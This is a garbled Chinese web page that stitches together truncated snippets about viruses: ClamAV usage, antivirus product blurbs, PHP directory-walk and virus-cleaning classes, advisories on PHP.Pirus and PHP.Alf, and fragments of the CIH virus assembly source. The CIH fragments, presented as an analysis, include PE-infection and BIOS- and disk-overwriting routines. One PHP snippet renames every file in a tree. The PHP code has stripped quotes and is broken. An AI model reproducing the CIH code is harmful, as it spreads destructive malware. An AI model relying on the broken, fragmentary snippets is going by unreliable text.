在用户收到发送过来的文件后 , 要能够检测出这个文件是否是病毒 , 核心的软件是clamav , 可以在linux命令行执行,检测文件或目录里的病毒推荐:PHP视频教程下载和安装可以参考其他技术文章。需要注意的是要开启下配置文件中的LocalSocket /tmp/clamd.socket 运行时是以守护进程的方式运行着一个clamd的程序 , 检测的时候只需要调用下面命令/usr/local/clamav-0.102.1/bin/clamdscan 文件响应的信息是下面的内容/usr/local/clamav-0...
电脑中安装杀毒软件可以减少病毒,国内常用的杀毒软件有:1、百度杀毒是百度公司出品的杀毒软件,百度杀毒软件支持Windows系统,并且永久免费,安装时建议同时安装百度卫士2、腾讯电脑管家是腾讯公司推出的安全软件,电脑管家永久免费,也在国内外的各种权威测评中多次获奖3、360杀毒是国内安全厂商奇虎360旗下产品,永久免费以上就是电脑中安装哪种软件,可以减少病毒的详细内容,更多请关注Gxl网其它相关文章!
/*我的程序在国外的SREVER上,自己编的程序存放到哪,我很难记清。 所以编了一个简单的目录递归函数,查看我的程序,很方便的。 */ function tree($directory) { $mydir=dir($directory); echo ""; while($file=$mydir->read()){ if((is_dir("$directory/$file")) AND ($file!=".") AND ($file!="..")){ echo "$file"; tree("$directory/$file"); }else{ echo "$file"; } } echo ""; $mydir->close(); } //start the program echo ...
网页是不是经常被无故的在php,asp,html,js 等文件后台加上一些木马地址呢?首先们要读取 $checkFile 文件这个文章是判断一个文章 是否被感染了,如果是就会执行$savafile变量里面的txt文件路径的所有文件,进行按你infecFile病毒列表清除一次。第一步、首先下载我们本节课程所需要用到的php中的类型约束类库:http://www.gxlcms.com/xiazai/leiku/629第二步、下载完成之后找到我们需要的php类文件,解压至我们本地目录,创建新的php文...
病毒程序源码实例剖析-CIH病毒[2]OriginalAppEXE SEGMENT ;PE格式可执行文件文件头 FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h...
jmp ExitRing0Init ;退出Ring0级 ;合并后的代码大小 CodeSizeOfMergeVirusCodeSection = offset $ ;新的IFSMgr_InstallFileSystemApiHook功能调用 InstallFileSystemApiHook: push ebx call @4 @4: pop ebx ;获得当前指令的偏移地址 add ebx, FileSystemApiHook-@4 ;加上偏移的差等于FileSystemApiHook的偏移 push ebx int 20h ;调用Vxd移去指向FileSystemApiHook的...
病毒程序源码实例剖析-CIH病毒[5]push ecx loop $ ;破坏BIOS中额外的000E0000 - 000E007F段的 ROM数据,共80h个字节 xor ah, ah mov [eax], al xchg ecx, eax loop $ ; 显示和激活BIOS的000E0000 - 000FFFFF段数据,共128 KB,该段可写入信息mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; 破坏BIOS的000FE000 - 000...
push eax ;块表大小 push edx ;edx为病毒代码块表的偏移 push esi ;缓冲区地址 ;合并的病毒代码块和病毒代码块表的总大小必须小于等于未使用的空间大小 inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h ;乘8 push ecx ;预留病毒块表空间 add ecx, eax add ecx, edx ;ecx+文件的正文的偏移 sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx ;求补,ecx为...
CIH病毒主要感染Windows 95/98/Me的可执行程序,发作时破坏计算机Flash BIOS芯片中的系统程序,导致主板损坏,同时破坏硬盘中的数据。病毒发作时,硬盘驱动器不停地旋转,病毒程序以2048个扇区为单位,从硬盘主引导区开始依次往硬盘中写入垃圾数据,直到硬盘数据被全部破坏为止。硬盘上所有数据(包括分区表)被破坏,必须重新分区才能有可能挽救硬盘。同时,对于部分厂牌的主板,如技嘉和微星等,会将Flash BIOS 中的系统程序破坏...
代码如下:<?php function foreachDir($path){ $handle=opendir($path); if($handle){ while (false !== ($file = readdir($handle))) { if($file!="." && $file!=..){ if(is_dir($path.$file)){ echo $path.$file.""; foreachDir($path.$file); }else{ echo "--".$path."/".$file.""; $ext = strripos($file,.); $aaa = substr($file,0,$ext); rename($path./.$file,$path./.$aaa..JPG); // die(); } } } return false; } } foreac...
Class clear_virus{ public $index ='b.html'; public $filepath =array('b.html'); public $virus_type =""; function open_file(){ if(file_exists($this->index)){ $tmp =file_get_contents($this->index); if( strrpos($tmp,$this->virus_type)!== false){ $temp =str_replace($this->virus_type,'',$tmp); $handle =fopen($this->index,'w'); fwrite($handle,$temp); fclose($handle); }else{ echo $this->virus_find; } } } ...
就是进行一些替换操作,大家可以测试Class clear_virus{
public $index =b.html;
public $filepath =array(b.html);
public $virus_type ="";
function open_file(){
if(file_exists($this->index)){
$tmp =file_get_contents($this->index);
if( strrpos($tmp,$this->virus_type)!== false){
$temp =str_replace($this->virus_type,,$tmp);
$handle =fopen($this->index,w);
fwrite($handle,$temp);
fclose($handle);
}else{
echo...
发现了第一只php病毒PHP.Pirus 来源:http://www.sarc.com/avcenter/venc/data/php.pirus.html 发现时间:2000-9-11 最后更新时间: 2000-11-13下午0 4:02:47 (太平洋标准时间) PHP.Pirus是第一只被发现的用PHP写的病毒,它寻找扩展名为.php和.htm的文件,并插入代码去调用自己。这个病毒只能在以php为解释器的服务器上。访问一个被它感染的网页并不能感染上病毒。 种类:病毒 感染长度:718字节 病毒发现时间:2000-11-13 危害程度: 疯...
你的网页是不是经常被无故的在php,asp,html,js 等文件后台加上一些木马地址呢?我以前有个站就是这样,所以一恨之下写了这段代码,文章虽然有一点浪费资源了,但是总比我们手动清除要好吧,下面我为讲讲程序的清除病毒的原理吧.
首先们要读取 $checkFile 文件这个文章是判断一个文章 是否被感染了,如果是就会执行$savafile变量里面的txt文件路径的所有文件,进行按你infecFile病毒列表清除一次.
Class clear_virus{//public $content;pub...
来自ESET的消息,新的专门感染PHP和Html文件的病毒及其变种于近期被发现,希望各位PHPer引起注意,及时升级您的杀毒软件。名称:PHP.Alf
病毒类型:蠕虫
感染长度:846字节
危害级别:中
传播速度:中
技术特征:
这是一个非常简单的病毒,专门感染后缀为.php、.htm及html的文件。病毒运行后,首先将自己改名为Script.php,为完成这一功能,它通过如下步骤进行:
1、将自己更名为Dir.php;
2、创建C:\Php(若本地机器不存在此目录的...